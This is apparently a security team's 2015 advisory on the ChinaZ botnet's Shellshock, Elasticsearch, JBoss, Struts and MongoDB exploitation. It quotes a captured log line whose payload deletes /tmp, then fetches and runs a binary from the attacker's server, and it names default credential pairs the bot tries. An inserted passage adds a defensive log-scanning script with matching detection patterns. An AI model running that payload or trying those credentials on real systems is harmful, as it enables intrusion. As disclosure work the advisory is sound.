
Re-emergence of an old threat

 

Good Afternoon!

Over the past couple of weeks, we have been tracking a possible re-emergence of a threat group originating from China: CZT. The security team here at CARI.net has done extensive research on this threat and is continuing to work with leading security companies as well as government agencies to verify, track and hopefully put an end to this new threat.

Starting in mid-November, there have been batches of requests that resemble the following:
222.186.21.115 - - [16/Mar/2015:07:00:56 -0700] "GET / HTTP/1.1" 200 13411 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

MalwareMustDie did an excellent write-up of the malware in January (found here). However, it appears that this is not the only threat that this actor is actively involved in. There is another write-up of the bot from November (found here).

It appears that Shellshock is just the tip of the iceberg. It is also readily apparent that this group has come back with a vengeance. Thanks to the continuing cooperation and gracious contribution of logs from John Matherly at Shodan, Mark Schloesser and HD Moore at Rapid7 and Patrick Gates at OddLot Creative, we have been able to track other vectors that CZT is using. CZT appears to exploit the following:

  • Elasticsearch (CVE-2014-3120) targeting ports 80, 8080, and 9200
  • JBoss (various CVEs) targeting a range of ports including 8081, 8090, 8091, 9999, 4445 and 9901
  • Struts (CVE-2013-2251) primarily targeting 80, 8080, and 443
  • Tomcat (unknown vector) targeting 80, 8080 and 443
  • RTSP devices (unknown vector) targeting port 554
  • MongoDB (CVE-2014-4650) targeting 27017

In addition to the software exploits, this new threat appears to be looking for several default user/password combinations, including admin/admin, root/admin, root/root and admin/root. There are several other combinations, but these are vendor specific. We will be contacting the appropriate vendors in order to facilitate awareness amongst their clients. The total number of infections via software exploits is no lower than 11k, and we have confirmed a probable 9k devices with default passwords on public interfaces.

At this time the CARISIRT team has located 10 controllers, and has been monitoring and downloading all malware, files and logs generated by this group. They are constantly updating and changing code as well as webserver locations. We are still in the process of notifying owners of compromised hosts, law enforcement agencies as well as other security teams. Due to the number of compromised hosts and the availability of the data on public interfaces, we are not yet ready to release all the information that we have gathered.


CARISIRT analyzing captured botnet control software.

Get Involved

 

Due to the way that CZT organizes target scanning, it is difficult to match the configuration and log files we have scraped from their controllers against the log files of actual targets. We are requesting any logs, malware samples or interesting traffic originating from AS23650, specifically 222.186.0.0/16. Also, any logs regarding /_search?pretty, /manager/html/, login.action, or any Shellshock entries that mention the term “ChinaZ” would be greatly appreciated. If you have been or fear you may be compromised by this threat, please let us know. Any information provided will be kept in confidence, unless given permission by the submitter for reuse. If you have these logs and would like to help out, please shoot us an email at sirt@cari.net.
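As an added illustration (not code from the original post or from CARI.net), the following Python script scans access-log lines in the combined format of the request quoted earlier for the indicators this post asks readers to look for: the Shellshock "() { :; };" prefix, the ChinaZ / China.Z marker, sources in 222.186.0.0/16, and the /_search?pretty, /manager/html/ and login.action paths. The sample log lines are constructed for the demonstration, not captured traffic.

```python
import ipaddress
import re

# Indicators taken from the post; the network is the one the post asks about.
CZT_NETWORK = ipaddress.ip_network("222.186.0.0/16")
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")  # the "() { :; };" function prefix
CZT_MARKER_RE = re.compile(r"China\.?Z", re.IGNORECASE)  # matches ChinaZ and China.Z
SUSPICIOUS_PATHS = ("/_search?pretty", "/manager/html/", "login.action")

def classify(line: str) -> list:
    """Return the names of every indicator that matches one access-log line."""
    hits = []
    src = line.split(" ", 1)[0]  # client address is the first combined-log field
    try:
        if ipaddress.ip_address(src) in CZT_NETWORK:
            hits.append("src:222.186.0.0/16")
    except ValueError:
        pass  # hostname or malformed field; skip the network check
    if SHELLSHOCK_RE.search(line):
        hits.append("shellshock")
    if CZT_MARKER_RE.search(line):
        hits.append("chinaz-marker")
    for path in SUSPICIOUS_PATHS:
        if path in line:
            hits.append("path:" + path)
    return hits

def scan(lines):
    """Yield (line_number, hits) for every line with at least one indicator."""
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            yield n, hits

# Constructed sample log lines (not real traffic): one benign request, one
# Shellshock probe modelled on the quoted request, an Elasticsearch and a Tomcat probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Mar/2015:06:59:01 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '222.186.21.115 - - [16/Mar/2015:07:00:56 -0700] "GET / HTTP/1.1" 200 13411 "() { :; }; /bin/bash -c \\"echo By China.Z >> /tmp/Run.sh\\"" "-"',
    '222.186.34.7 - - [16/Mar/2015:07:02:10 -0700] "GET /_search?pretty HTTP/1.1" 404 200 "-" "python-requests/2.5"',
    '198.51.100.9 - - [16/Mar/2015:07:03:00 -0700] "POST /manager/html/ HTTP/1.1" 401 0 "-" "-"',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Run it against a real access log with `scan(open("access.log"))`; a hit on the network alone is worth less than a Shellshock or ChinaZ hit, so triage the multi-indicator lines first.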

 

We will be releasing our full report in the following weeks. For any additional information, please contact us at sirt@cari.net and a member of our security team will get back to you shortly. Thanks for reading and have a great day!

Regards,

Zachary Wikholm
Head of Security Incident Response Team (CARISIRT)
sirt@cari.net
CARI.net